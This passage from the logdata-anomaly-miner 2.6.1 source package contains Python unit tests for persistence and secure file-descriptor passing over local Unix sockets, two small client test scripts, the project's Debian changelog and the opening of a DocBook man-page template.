intend. 
""" obj = '["bytes:1", "string:2", 3, ["string:4"]]' self.assertEqual(load_json(obj), [b'1', '2', 3, ['4']]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/util/PersistenceUtilTest.py000066400000000000000000000205461437606560100273040ustar00rootroot00000000000000import unittest import sys import io from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch import time from aminer.util import PersistenceUtil from aminer.parsing.MatchContext import MatchContext from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector from unit.TestBase import TestBase class PersistenceUtilTest(TestBase): """Unittests for the PersistenceUtil class.""" string = b'25537 uid=2' match_context_fixed_dme = MatchContext(b' pid=') fixed_dme = FixedDataModelElement('s1', b' pid=') match_element_fixed_dme = fixed_dme.get_match_element("", match_context_fixed_dme) match_context_decimal_integer_value_me = MatchContext(string) decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_element_decimal_integer_value_me = decimal_integer_value_me.get_match_element("", match_context_decimal_integer_value_me) fixed_dme = FixedDataModelElement('s1', string) decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context_first_match_me = MatchContext(string) first_match_me = FirstMatchModelElement('f1', [fixed_dme, decimal_integer_value_me]) match_element_first_match_me = 
first_match_me.get_match_element('first', match_context_first_match_me) match_context_first_match_me2 = MatchContext(string) first_match_me2 = FirstMatchModelElement('f2', [decimal_integer_value_me, fixed_dme]) match_element_first_match_me2 = first_match_me2.get_match_element('second', match_context_first_match_me2) def test1persist_multiple_objects_of_single_class(self): """In this test case multiple instances of one class are to be persisted and loaded.""" description = "Test1PersistenceUtil" new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True) self.analysis_context.register_component(new_match_path_detector, description) t = time.time() log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector) log_atom_decimal_integer_value_me = LogAtom(self.match_context_decimal_integer_value_me.match_data, ParserMatch(self.match_element_decimal_integer_value_me), t, new_match_path_detector) new_match_path_detector.receive_atom(log_atom_fixed_dme) new_match_path_detector.receive_atom(log_atom_decimal_integer_value_me) other_new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'otherDetector', True) self.analysis_context.register_component(other_new_match_path_detector, description + "2") log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, other_new_match_path_detector) other_new_match_path_detector.receive_atom(log_atom_fixed_dme) PersistenceUtil.persist_all() persistence_data = PersistenceUtil.load_json(new_match_path_detector.persistence_file_name) self.assertTrue( persistence_data in ([self.match_element_fixed_dme.get_path(), self.match_element_decimal_integer_value_me.get_path()], [ self.match_element_decimal_integer_value_me.get_path(), self.match_element_fixed_dme.get_path()])) 
self.assertEqual(PersistenceUtil.load_json(other_new_match_path_detector.persistence_file_name), [ self.match_element_fixed_dme.get_path()]) def test2persist_multiple_objects_of_multiple_class(self): """In this test case multiple instances of multiple classes are to be persisted and loaded.""" description = "Test2PersistenceUtil" new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default2', True) self.analysis_context.register_component(new_match_path_detector, description) t = time.time() log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector) log_atom_decimal_integer_value_me = LogAtom(self.match_context_decimal_integer_value_me.match_data, ParserMatch(self.match_element_decimal_integer_value_me), t, new_match_path_detector) new_match_path_detector.receive_atom(log_atom_fixed_dme) new_match_path_detector.receive_atom(log_atom_decimal_integer_value_me) other_new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'otherDetector2', True) self.analysis_context.register_component(other_new_match_path_detector, description + "2") log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, other_new_match_path_detector) other_new_match_path_detector.receive_atom(log_atom_fixed_dme) new_match_path_value_combo_detector = NewMatchPathValueComboDetector(self.aminer_config, ['first/f1/s1'], [self.stream_printer_event_handler], 'Default', False, True) self.analysis_context.register_component(new_match_path_value_combo_detector, description + "3") log_atom_sequence_me = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_first_match_me), t, new_match_path_value_combo_detector) new_match_path_value_combo_detector.receive_atom(log_atom_sequence_me) PersistenceUtil.persist_all() persistence_data = 
PersistenceUtil.load_json(new_match_path_detector.persistence_file_name) self.assertTrue( persistence_data in ([self.match_element_fixed_dme.get_path(), self.match_element_decimal_integer_value_me.get_path()], [ self.match_element_decimal_integer_value_me.get_path(), self.match_element_fixed_dme.get_path()])) self.assertEqual(PersistenceUtil.load_json(other_new_match_path_detector.persistence_file_name), [self.match_element_fixed_dme.get_path()]) self.assertEqual(PersistenceUtil.load_json(new_match_path_value_combo_detector.persistence_file_name), ([[log_atom_sequence_me.raw_data]])) def test3_no_unique_persistence_id(self): """Check if a warning is printed if the same persistence_id is used for the same component type.""" old_stderr = sys.stderr new_stderr = io.StringIO() sys.stderr = new_stderr PersistenceUtil.SKIP_PERSISTENCE_ID_WARNING = False NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True) NewMatchPathValueComboDetector(self.aminer_config, ['first/f1/s1'], [self.stream_printer_event_handler], 'Default', False, True) self.assertEqual('', new_stderr.getvalue()) NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True) self.assertEqual('Warning: Detectors of type NewMatchPathDetector use the persistence_id "Default" multiple times. Please assign a' ' unique persistence_id for every component.\n', new_stderr.getvalue()) new_stderr.seek(0) new_stderr.truncate(0) NewMatchPathValueComboDetector(self.aminer_config, ['first/f1/s1'], [self.stream_printer_event_handler], 'Default', False, True) self.assertEqual('Warning: Detectors of type NewMatchPathValueComboDetector use the persistence_id "Default" multiple times. 
Please' ' assign a unique persistence_id for every component.\n', new_stderr.getvalue()) sys.stderr = old_stderr if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/util/SecureOSFunctionsTest.py000066400000000000000000000140061437606560100275350ustar00rootroot00000000000000import unittest import sys import os import socket from _io import StringIO # skipcq: BAN-B404 import subprocess from aminer.util.SecureOSFunctions import secure_open_file, send_annotated_file_descriptor, receive_annoted_file_descriptor from aminer.util import SecureOSFunctions from aminer.input.LogStream import UnixSocketLogDataResource from unit.TestBase import TestBase class SecureOSFunctionsTestLocal(TestBase): """This test class must be run locally due to import problems.""" opening_socket = 'Opening socket...' listening = 'Listening...' """This test case is commented out, because it is still not implemented.""" # ''' # A file is tried to be opened by using the secure function. # ''' # def test1_secure_open_file(self): # error = sys.stderr = StringIO() # # if an exception is thrown, the test fails. 
# secure_open_file(b'/etc/aminer/conf-enabled/Readme.txt', os.O_RDONLY) # SecureOSFunctions.no_secure_open_warn_once_flag = True # self.assertEqual(error.getvalue(), '') def test2_secure_open_file_relative_path(self): """A file is tried to be opened by using a relative path.""" self.assertRaises(Exception, secure_open_file, 'JsonUtilTest.py', os.O_RDONLY) def test3_secure_open_directory(self): """A directory is tried to be opened without using the O_Directory flag.""" error = sys.stderr = StringIO() directory = b'/etc/' self.assertRaises(Exception, secure_open_file, directory, os.O_RDONLY) secure_open_file(directory, os.O_DIRECTORY) SecureOSFunctions.no_secure_open_warn_once_flag = True self.assertTrue( error.getvalue() in ['WARNING: SECURITY: No secure open yet due to missing openat in python!\n', '']) def test4sendAnnotatedFileDescriptor(self): """A valid annotated file descriptor is to be sent by a socket.""" sock_name = '/tmp/test4unixSocket.sock' # skipcq: BAN-B108 data = b'readmeStream' + b'\x00' + b'You should read these README instructions for better understanding.' 
# skipcq: BAN-B607, BAN-B603 proc = subprocess.Popen(['python3', 'unit/util/clientTest4.py']) if os.path.exists(sock_name): os.remove(sock_name) # print(self.opening_socket) server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) server.bind(sock_name) server.listen(1) connection = server.accept()[0] unix_socket_log_data_resource = UnixSocketLogDataResource(b'unix:///tmp/test4unixSocket.sock', connection.fileno()) # print(self.listening) unix_socket_log_data_resource.fill_buffer() self.assertEqual(unix_socket_log_data_resource.buffer, data) # print('Data received: %s' % unix_socket_log_data_resource.buffer) unix_socket_log_data_resource.update_position(len(unix_socket_log_data_resource.buffer)) self.assertEqual(unix_socket_log_data_resource.total_consumed_length, 80) self.assertEqual(unix_socket_log_data_resource.buffer, b'') # print("Shutting down...") unix_socket_log_data_resource.close() proc.terminate() proc.wait() # print("Done") def test5send_annotated_file_descriptor_invalid_parameters(self): """An invalid access is to be performed by using a closed socket.""" # socket is closed fd = secure_open_file(b'/etc/aminer/conf-enabled/Readme.txt', os.O_RDONLY) client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) self.assertRaises(OSError, send_annotated_file_descriptor, client, fd, b'readmeStream', b'You should read these README instructions for better understanding.') def test6send_logstream_descriptor(self): """A valid logstream descriptor is to be sent.""" sock_name = '/tmp/test6unixSocket.sock' # skipcq: BAN-B108 data = b'logstream' + b'\x00' + b'/var/log/syslog' # skipcq: BAN-B607, BAN-B603 subprocess.Popen(['python3', 'unit/util/clientTest6.py']) if os.path.exists(sock_name): os.remove(sock_name) # print(self.opening_socket) server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) server.bind(sock_name) server.listen(1) connection = server.accept()[0] unix_socket_log_data_resource = UnixSocketLogDataResource(b'unix:///tmp/test6unixSocket.sock', 
connection.fileno()) # print(self.listening) unix_socket_log_data_resource.fill_buffer() self.assertEqual(unix_socket_log_data_resource.buffer, data) # print('Data received: %s' % unix_socket_log_data_resource.buffer) unix_socket_log_data_resource.update_position(len(unix_socket_log_data_resource.buffer)) self.assertEqual(unix_socket_log_data_resource.total_consumed_length, 25) self.assertEqual(unix_socket_log_data_resource.buffer, b'') # print("Shutting down...") unix_socket_log_data_resource.close() # print("Done") def test7receive_annotated_file_descriptor(self): """A valid annotated file descriptor is to be received by a socket.""" sock_name = '/tmp/test6unixSocket.sock' # skipcq: BAN-B108 type_info = b'logstream' path = b'/var/log/syslog' data = (type_info, path) # skipcq: BAN-B607, BAN-B603 subprocess.Popen(['python3', 'unit/util/clientTest6.py']) if os.path.exists(sock_name): os.remove(sock_name) # print(self.opening_socket) server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) server.bind(sock_name) server.listen(1) connection = server.accept()[0] data_tuple = receive_annoted_file_descriptor(connection) # print(self.listening) self.assertEqual(data_tuple[1], data[0]) self.assertEqual(data_tuple[2], data[1]) # print('Data received: (%i, %s, %s)' % data_tuple) self.assertEqual(len(data_tuple[1]) + len(data_tuple[2]), 24) # print("Done") if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/util/__init__.py000066400000000000000000000000001437606560100250400ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/util/clientTest4.py000066400000000000000000000011041437606560100255110ustar00rootroot00000000000000from time import sleep import socket import sys import os sys.path.append('./') sys.path.append('../../') # skipcq: FLK-E402 from aminer.util.SecureOSFunctions import secure_open_file, send_annotated_file_descriptor sock_name = '/tmp/test4unixSocket.sock' # skipcq: BAN-B108 fd = 
secure_open_file(b'/etc/aminer/conf-enabled/Readme.txt', os.O_RDONLY) sleep(0.5) client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) client.connect(sock_name) send_annotated_file_descriptor(client, fd, b'readmeStream', b'You should read these README instructions for better understanding.') logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/util/clientTest6.py000066400000000000000000000007411437606560100255210ustar00rootroot00000000000000from time import sleep import socket import sys import os sys.path.append('../../') sys.path.append('./') # skipcq: FLK-E402 from aminer.util.SecureOSFunctions import secure_open_file, send_logstream_descriptor sock_name = '/tmp/test6unixSocket.sock' # skipcq: BAN-B108 fd = secure_open_file(b'/var/log/syslog', os.O_RDONLY) sleep(0.5) client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) client.connect(sock_name) send_logstream_descriptor(client, fd, b'/var/log/syslog') logdata-anomaly-miner-2.6.1/changelog000066400000000000000000000530661437606560100175750ustar00rootroot00000000000000logdata-anomaly-miner (2.6.1) unstable; urgency=low Changes: * minor refactoring * fixed code styling issues -- Markus Wurzenberger Tue, 21 Feb 2023 12:00:00 +0000 logdata-anomaly-miner (2.6.0) unstable; urgency=low Bugfixes: * fixed bug in JsonModelElement where the aminer gets stuck in an endless loop searching for \x. * added input file path sanitization and fixed exception handling. * fixed a test for the remote control save config method. * fixed bug, that occured when starting one of the detectors VTD, VCD and TSA with an already existing persistency of the ETD, but not of the detectors. * fixed the MissingMatchPathValueDetector by comparing the detector_info[0] instead of the old_last_seen_timestamp. * ParserCount: Fixed timestamp in output * implemented the output_logline parameter in the NewMatchPathValueDetector. 
* fixed bug where the MissingMatchPathListValueDetector could not be used in yaml, because the ConfigValidator could not load the module. * runHowToEntropyDetector had missing permissions on CFG_PATH in some lines. * fixed bug with closing the streams. Changes: * renamed schemas to python files. * enabled systemd autorestart * improved documentation * added SlidingEventFrequencyDetector * added timestamp_scale parameter to the DateTimeModelElement. * added unique path param for EFD * added check so EXP_TYPE_MANDATORY is enforced. * replace raw data output with last log of event type rather than end of time window * added event count cluster detector * added experimental jsonstringparser * improved parameter consistency * added ScoringEventHandler * EFD: Added the functionality to analze the scoring_path_list with the ScoringEventHandler * ETD/TSA: Moved the initialization part of the TSA from the ETD to the TSA * support for ZeroMQ-Eventhandler * added support for named-pipes -- Markus Wurzenberger Fri, 20 Jan 2023 12:00:00 +0000 logdata-anomaly-miner (2.5.1) unstable; urgency=low Bugfixes: * EFD: Fixed problem that appears with empty windows * Fixed index out of range if matches are empty in JsonModelElement array. 
* EFD: Fixed problem that appears with empty windows * EFD: Enabled immediate detection without training, if both limits are set * EFD: Fixed bug related to auto_include_flag * Remove spaces in aminer logo * ParserCounter: Fixed do_timer * Fixed code to allow the usage of AtomFilterMatchAction in yaml configs * Fixed JsonModelElement when json object is null * Fix incorrect message of charset detector * Fix match list handling for json objects * Fix incorrect message of charset detector Changes: * Added nullable functionality to JsonModelElements * Added include-directive to supervisord.conf * ETD: Output warning when count first exceeds range * EFD: Added option to output anomaly when the count first exceeds the range * VTD: Added variable type 'range' * EFD: Added the function reset_counter * EFD: Added option to set the lower and upper limit of the range interval * Enhance EFD to consider multiple time windows * VTD: Changed the value of parameter num_updates_until_var_reduction to track all variables from False to 0. 
* PAD: Used the binom_test of the scipy package as test if the model should be reinitialized if too few anomalies occur than are expected * Add ParsedLogAtom to aminer parser to ensure compatibility with lower versions * Added script to add build-id to the version-string * Support for installations from source in install-script * Fixed and stadardize the persistence time of various detectors * Refactoring * Improve performance * Improve output handling * Improved testing -- Markus Wurzenberger Mon, 09 May 2022 12:00:00 +0000 logdata-anomaly-miner (2.5.0) unstable; urgency=low Bugfixes: * Fixed bug in YamlConfig Changes: * Added supervisord to docker * Moved unparsed atom handlers to analysis(yamlconfig) * Moved new_match_path_detector to analysis(yamlconfig) * Refactor: merged all UnparsedHandlers into one python-file * Added remotecontrol-command for reopening eventhandlers * Added config-parameters for logrotation * Improved testing -- Markus Wurzenberger Fri, 03 Dec 2021 12:00:00 +0000 logdata-anomaly-miner (2.4.2) unstable; urgency=low Bugfixes: * PVTID: Fixed output format of previously appeared times * VTD: Fixed bugs (static -> discrete) * VTD: Fixed persistency-bugs * Fixed %z performance issues * Fixed error where optional keys with an array type are not parsed when being null * Fixed issues with JasonModelElement * Fixed persistence handling for ValueRangeDetector * PTSAD: Fixed a bug, which occurs, when the ETD stops saving the values of one analyzed path * ETD: Fixed the problem when entries of the match_dictionary are not of type MatchElement * Fixed error where json data instead of array was parsed successfully. 
Changes: * Added multiple parameters to VariableCorrelationDetector * Improved VTD * PVTID: Renamed parameter time_window_length to time_period_length * PVTID: Added check if atom time is None * Enhanced output of MTTD and PVTID * Improved docker-compose-configuration * Improved testing * Enhanced PathArimaDetector * Improved documentation * Improved KernelMsgParsingModel * Added pretty print for json output * Added the PathArimaDetector * TSA: Added functionality to discard arima models with too few log lines per time step * TSA: improved confidence calculation * TSA: Added the option to force the period length * TSA: Automatic selection of the pause area of the ACF * Extended EximGenericParsingModel * Extended AudispdParsingModel -- Markus Wurzenberger Tue, 23 Nov 2021 12:00:00 +0000 logdata-anomaly-miner (2.4.1) unstable; urgency=low Bugfixes: * Fixed issues with array of arrays in JsonParser * Fixed problems with invalid json-output * Fixed ValueError in DTME * Fixed error with parsing floats in scientific notation with the JsonModelElement. 
* Fixed issue with paths in JsonModelElement * Fixed error with \x encoded json * Fixed error where EMPTY_ARRAY and EMPTY_OBJECT could not be parsed from the yaml config * Fixed a bug in the TSA when encountering a new event type * Fixed systemd script * Fixed encoding errors when reading yaml configs Changes: * Add entropy detector * Add charset detector * Add value range detector * Improved ApacheAccessModel, AudispdParsingModel * Refactoring * Improved documentation * Improved testing * Improved schema for yaml-config * Added EMPTY_STRING option to the JsonModelElement * Implemented check to report unparsed atom if ALLOW_ALL is used with data with a type other than list or dict -- Markus Wurzenberger Fri, 23 Jul 2021 12:00:00 +0000 logdata-anomaly-miner (2.4.0) unstable; urgency=low Bugfixes: * Fixed error in JsonModelElement * Fixed problems with umlauts in JsonParser * Fixed problems with the start element of the ElementValueBranchModelElement * Fixed issues with the stat and debug command line parameters * Fixed issues if posix acl are not supported by the filesystem * Fixed issues with output for non ascii characters * Modified kafka-version Changes: * Improved command-line-options install-script * Added documentation * Improved VTD CM-Test * Improved unit-tests * Refactoring * Added TSAArimaDetector * Improved ParserCount * Added the PathValueTimeIntervalDetector * Implemented offline mode * Added PCA detector * Added timeout-paramter to ESD -- Markus Wurzenberger Fri, 04 Jun 2021 12:00:00 +0000 logdata-anomaly-miner (2.3.1) unstable; urgency=low Bugfixes: * Replaced username and groupname with uid and gid for chown() * Removed hardcoded username and groupname -- Markus Wurzenberger Thu, 08 Apr 2021 12:00:00 +0000 logdata-anomaly-miner (2.3.0) unstable; urgency=low Bugfixes: * Changed pyyaml-version to 5.4 * NewMatchIdValueComboDetector: Fix allow multiple values per id path * ByteStreamLineAtomizer: fixed encoding error * Fixed too many open 
directory-handles * Added close() function to LogStream Changes: * Added EventFrequencyDetector * Added EventSequenceDetector * Added JsonModelElement * Added tests for Json-Handling * Added command line parameter for update checks * Improved testing * Splitted yaml-schemas into multiple files * Improved support for yaml-config * YamlConfig: set verbose default to true * Various refactoring -- Markus Wurzenberger Mon, 29 Mar 2021 12:00:00 +0000 logdata-anomaly-miner (2.2.1) unstable; urgency=low Bugfixes: * Fixed warnigs due to files in Persistency-Directory * Fixed ACL-problems in dockerfile and autocreate /var/lib/aminer/log Changes: * added simple test for dockercontainer * negate result of the timeout-command. 1 is okay. 0 must be an error * added bullseye-tests * make tmp-dir in debian-bullseye-test and debian-buster-test unique -- Markus Wurzenberger Mon, 25 Jan 2021 12:00:00 +0000 logdata-anomaly-miner (2.2.0) unstable; urgency=low Changes: * Added Dockerfile * Addes checks for acl of persistency directory * Added VariableCorrelationDetector * Added tool for managing multiple persistency files * Added supress-list for output * Added suspend-mode to remote-control * Added requirements.txt * Extended documentation * Extended yaml-configuration-support * Standardize command line parameters * Removed --Forground cli parameter * Fixed Security warnings by removing functions that allow race-condition * Refactoring * Ethical correct naming of variables * Enhanced testing * Added statistic outputs * Enhanced status info output * Changed global learn_mode behavior * Added RemoteControlSocket to yaml-config * Reimplemented the default mailnotificationhandler Bugfixes: * Fixed typos in documentation * Fixed issue with the AtomFilter in the yaml-config * Fixed order of ETD in yaml-config * Fixed various issues in persistency -- Markus Wurzenberger Fri, 18 Dec 2020 17:00:00 +0000 logdata-anomaly-miner (2.1.0) unstable; urgency=low Changes: * Added 
VariableTypeDetector,EventTypeDetector and EventCorrelationDetector * Added support for unclean format strings in the DateTimeModelElement * Added timezones to the DateTimeModelElement * Enhanced ApacheAccessModel * Yamlconfig: added support for kafka stream * Removed cpu limit configuration * Various refactoring * Yamlconfig: added support for more detectors * Added new command-line-parameters * Renamed executables to aminer.py and aminerremotecontroly.py * Run Aminer in forgroundd-mode per default * Added various unit-tests * Improved yamlconfig and checks * Added start-config for parser to yamlconfig * Renamed config templates * Removed imports from init.py for better modularity * Created AnalysisComponentsPerformanceTests for the EventTypeDetector * Extended demo-config * Renamed whitelist to allowlist * Added warnings for non-existent resources * Changed default of auto_include_flag to false Bugfixes: * Fixed some exit() in forks * Fixed debian files * Fixed JSON output of the AffectedLogAtomValues in all detectors * Fixed normal output of the NewMatchPathValueDetector * Fixed reoccuring alerting in MissingMatchPathValueDetector -- Markus Wurzenberger Thu, 05 Nov 2020 17:00:00 +0000 logdata-anomaly-miner (2.0.2) unstable; urgency=low Changes: * Added help parameters * Added help-screen * Added version parameter * Adden path and value filter * Change time model of ApacheAccessModel for arbitrary time zones * Update link to documentation * Added SECURITY.md * Refactoring * Updated man-page * Added unit-tests for loadYamlconfig Bugfixes: * Fixed header comment type in schema file * Fix debian files -- Markus Wurzenberger Wed, 17 Jul 2020 17:00:00 +0000 logdata-anomaly-miner (2.0.1) unstable; urgency=low Changes: * Updated documentation * Updated testcases * Updated demos * Updated debian files * Added copyright headers * Added executable bit to AMiner -- Markus Wurzenberger Wed, 24 Jun 2020 17:00:00 +0000 logdata-anomaly-miner (2.0.0) bionic; urgency=low Changes: 
* Updated documentation * Added functions getNameByComponent and getIdByComponent to AnalysisChild.py * Update DefaultMailNotificationEventHandler.py to python3 * Extended AMinerRemoteControl * Added support for configuration in yaml format * Refactoring * Added KafkaEventHandler * Added JsonConverterHandler * Added NewMatchIdValueComboDetector * Enabled multiple default timestamp paths * Added debug feature ParserCount * Added unit and integration tests * Added installer script * Added VerboseUnparsedHandler Bugfixes including: * Fixed dependencies in Debian packaging * Fixed typo in various analysis components * Fixed import of ModelElementInterface in various parsing components * Fixed issues with byte/string comparison * Fixed issue in DecimalIntegerValueModelElement, when parsing integer including sign and padding character * Fixed unnecessary long blocking time in SimpleMultisourceAtomSync * Changed minum matchLen in DelimitedDataModelElement to 1 byte * Fixed timezone offset in ModuloTimeMatchRule * Minor bugfixes -- Markus Wurzenberger Fri, 29 May 2020 17:00:00 +0000 logdata-anomaly-miner (1.0.0) bionic; urgency=low Changes: * Ported code to Python 3 * Code cleanup using pylint * Added util/JsonUtil.py to encode byte strings for storing them as json objects * Added docs/development-procedures.txt which documents development procedures Features: * New MissingMatchPathListValueDetector to detect stream interuption * Added parsing support for kernel IP layer martian package messages * Systemd parsing of apt invocation messages. 
Bugfixes: * AnalysisChild: handle remote control client connection errors correctly * Various bugfixes -- Markus Wurzenberger Tue, 2 Oct 2018 17:00:00 +0000 logdata-anomaly-miner (0.0.8) xenial; urgency=low Apart from bugfixes, new parsing and analysis components were added: * Base64StringModelElement * DecimalFloatValueModelElement * StringRegexMatchRule * EnhancedNewMatchPathValueComboDetector -- Roman Fiedler Tue, 30 May 2017 17:00:00 +0000 logdata-anomaly-miner (0.0.7) xenial; urgency=low The datetime parsing DateTimeModelElement was reimplemented to fix various shortcomings of strptime in Python and libc. This will require changes in configuration due to API changes, e.g.: -time_model=DateTimeModelElement('time', '%b %d %H:%M:%S', 15, False) +time_model=DateTimeModelElement('time', '%b %d %H:%M:%S') See /usr/lib/logdata-anomaly-miner/aminer/parsing/DateTimeModelElement.py source code documentation for currently supported datetime format options. The code for reading log input was improved to allow also input from UNIX sockets. Thus the configuration was changed to support those modes: -config_properties['LogFileList']=['/var/log/auth.log', ... +config_properties['LogResourceList'] = ['file:///var/log/auth.log', ... -- Roman Fiedler Mon, 9 Jan 2017 18:00:00 +0000 logdata-anomaly-miner (0.0.6) xenial; urgency=low The input IO-handling was redesigned, thus introducing following API changes. The changes are flaged with (D)eveloper and (U)ser to indicate if only developers of own AMiner addons are affected or also users may need to migrate their configuration. * Upper layers receive LogAtom objects instead of log lines, parsing data as separate parameters. Thus also separate paths for forwarding of parsed and unparsed atoms are not required any more. 
See below for details (D, U): * Update any own UnparsedAtomHandler/ParsedAtomHandlerInterface implementations to use new interface "input.AtomHandlerInterface" and access to additional information to new methods and fields (D): -from aminer.parsing import ParsedAtomHandlerInterface +from aminer.input import AtomHandlerInterface -class YourHandler(ParsedAtomHandlerInterface, ... +class YourHandler(AtomHandlerInterface, - def receiveParsedAtom(self, atom_data, parser_match): + def receive_atom(self, log_atom): - timestamp=parser_match.get_default_timestamp() + timestamp=log_atom.get_timestamp() + parser_match=log_atom.parser_match - print '%s' % atom_data + print '%s' % log_atom.rawData * With parsed/unparsed atom processing path convergence, naming of other classes does not make sense any more (U): -from aminer.analysis import VolatileLogarithmicBackoffParsedAtomHistory +from aminer.util import VolatileLogarithmicBackoffAtomHistory - from aminer.analysis import ParsedAtomFilters + from aminer.analysis import AtomFilters - match_action=Rules.ParsedAtomFilterMatchAction(... + match_action=Rules.AtomFilterMatchAction(... - parsed_atom_handlers=[] - unparsed_atom_handlers=[] - analysis_context.atomizer_factory=SimpleByteStreamLineAtomizerFactory( - parsing_model, parsed_atom_handlers, unparsed_atom_handlers, ... + atom_filter=AtomFilters.SubhandlerFilter(None) + analysis_context.atomizer_factory=SimpleByteStreamLineAtomizerFactory( + parsing_model, [atom_filter], ... For handling of unparsed atoms: - unparsed_atom_handlers.append(SimpleUnparsedAtomHandler(anomaly_event_handlers)) + atom_filter.add_handler(SimpleUnparsedAtomHandler(anomaly_event_handlers), + stop_when_handled_flag=True) For handling of parsed atoms: - parsed_atom_handlers.append(... + atom_filter.add_handler(... 
-- Roman Fiedler Fri, 4 Nov 2016 18:00:00 +0000 logdata-anomaly-miner (0.0.5) xenial; urgency=low Following API changes were introduced: * Lower input layers dealing with binary data stream reading, splitting into atoms and forwarding data to the parsing model were redesigned. Following configuration changes are required to adapt "config.py" and probably "analysis.py" to the new API: * analysis_context.register_component(): register_as_raw_atom_handler parameter not needed any more, can be removed. * SimpleParsingModelRawAtomHandler is not needed any more, that part can be replaced by configuration: # Now define the AtomizerFactory using the model. A simple line # based one is usually sufficient. from aminer.input import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory=SimpleByteStreamLineAtomizerFactory( parsing_model, parsed_atom_handlers, unparsed_atom_handlers, anomaly_event_handlers, default_timestamp_paths=['/model/syslog/time']) * SimpleUnparsedAtomHandler was moved from "aminer.events" to "aminer.input". -- Roman Fiedler Mon, 11 Oct 2016 18:00:00 +0000 logdata-anomaly-miner (0.0.4) xenial; urgency=low Following API changes were introduced: * Event handling (general): Change of EventHandlerInterface to include also event_source as last parameter. See /usr/lib/logdata-anomaly-miner/aminer/events/__init__.py * VolatileLogarithmicBackoffEventHistory: Added event ID and source to stored tuple to allow unique identification of events. Split result of "getHistory()" to include "eventId, eventType, event_message, sorted_log_lines, event_data, event_source". -- Roman Fiedler Fri, 26 Aug 2016 15:15:00 +0000 logdata-anomaly-miner (0.0.3) xenial; urgency=low Following API changes were introduced: * To improve readability of configuration files, main parser, analysis and event classes were added to the submodule namespaces. After imports directly from the submodule, e.g. 
"from aminer.parsing import FixedDataModelElement", the name duplication "FixedDataModelElement.FixedDataModelElement" is not required any more, "FixedDataModelElement" is sufficient. Use "sed -i -e 's/Name.Name/Name/g' [files]" to adapt. * Component timing was restructured to allow forensic/realtime triggering. Therefore also clean interface was added, which is now also used to reduce redundant code in component registration. Old way: analysis_context.register_component(new_match_path_detector, component_name=None, register_as_raw_atom_handler=False, register_as_time_triggered_handler=True) New way: analysis_context.register_component(new_match_path_detector, register_as_raw_atom_handler=False) For own custom time-triggered components, make sure to implement the "aminer.util.TimeTriggeredComponentInterface". Use any standard component, e.g. "/usr/lib/logdata-anomaly-miner/aminer/analysis/NewMatchPathDetector.py" as example. * Introduction of "AnalysisContext" to have common handle for all data required to perform the analysis. Therefore also the signature of "build_analysis_pipeline" in "config.py/analysis.py" has changed from def build_analysis_pipeline(aminer_config): to def build_analysis_pipeline(analysis_context): Old references to "aminer_config" within the configuration script have to be replaced by "analysis_context.aminer_config". -- Roman Fiedler Thu, 21 Jul 2016 19:00:00 +0000 logdata-anomaly-miner-2.6.1/debian/000077500000000000000000000000001437606560100171335ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/debian/aminer.1.xml000066400000000000000000000230151437606560100212700ustar00rootroot00000000000000 .

will be generated. You may view the manual page with: nroff -man .
| less'. A typical entry in a Makefile or Makefile.am is: DB2MAN = /usr/share/sgml/docbook/stylesheet/xsl/docbook-xsl/manpages/docbook.xsl XP = xsltproc -''-nonet -''-param man.charmap.use.subset "0" manpage.1: manpage.xml $(XP) $(DB2MAN) $< The xsltproc binary is found in the xsltproc package. The XSL files are in docbook-xsl. A description of the parameters you can use can be found in the docbook-xsl-doc-* packages. Please remember that if you create the nroff version in one of the debian/rules file targets (such as build), you will need to include xsltproc and docbook-xsl in your Build-Depends control field. Alternatively use the xmlto command/package. That will also automatically pull in xsltproc and docbook-xsl. Notes for using docbook2x: docbook2x-man does not automatically create the AUTHOR(S) and COPYRIGHT sections. In this case, please add them manually as ... . To disable the automatic creation of the AUTHOR(S) and COPYRIGHT sections read /usr/share/doc/docbook-xsl/doc/manpages/authors.html. This file can be found in the docbook-xsl-doc-html package. Validation can be done using: `xmllint -''-noout -''-valid manpage.xml` General 